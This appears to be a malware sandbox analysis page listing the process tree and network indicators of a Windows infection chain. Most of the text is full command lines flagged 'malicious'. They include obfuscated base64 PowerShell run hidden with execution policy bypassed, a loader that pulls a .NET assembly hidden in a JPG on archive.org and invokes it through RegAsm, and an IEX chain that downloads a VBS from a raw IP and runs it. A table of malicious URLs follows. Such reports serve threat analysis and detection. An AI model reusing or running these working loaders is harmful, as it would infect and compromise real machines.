? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"
There are 9 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://ia803104.us.archive.org
unknown
 malicious
http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF
192.3.193.155
 malicious
https://ia803104.us.archive.org/27/items/vbs_20240
unknown
 malicious
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
207.241.232.154
 malicious
